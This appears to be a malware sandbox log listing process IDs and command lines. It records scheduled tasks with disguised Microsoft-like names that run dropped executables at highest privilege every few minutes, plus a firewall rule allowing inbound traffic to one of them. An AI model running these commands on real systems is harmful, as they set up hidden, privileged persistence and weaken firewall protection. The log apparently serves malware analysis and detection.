cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft Web Edge" /tr "C:\Users\test22\AppData\Local\CrashDumps\Crash.exe" /RL HIGHEST & exit
2348schtasks.exe schtasks /create /f /sc minute /mo 30 /tn "Microsoft Web Edge" /tr "C:\Users\test22\AppData\Local\CrashDumps\Crash.exe" /RL HIGHEST
2464cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc minute /mo 5 /tn "Microsoft\Windows\issas" /tr "C:\Windows\Performance\WinSAT\issas.exe" /RL HIGHEST & exit
2496schtasks.exe schtasks /create /f /sc minute /mo 5 /tn "Microsoft\Windows\issas" /tr "C:\Windows\Performance\WinSAT\issas.exe" /RL HIGHEST
2692cmd.exe "C:\Windows\System32\cmd.exe" /c netsh advfirewall firewall add rule name="issas" dir=in action=allow program="C:\Windows\Performance\WinSAT\issas.exe" enable=yes & exit
2420netsh.exe netsh advfirewall firewall add rule name="issas" dir=in action=allow program="C:\Windows\Performance\WinSAT\issas.exe" enable=yes
2624issas.exe "C:\Windows\Performance\WinSAT\issas.exe"
2580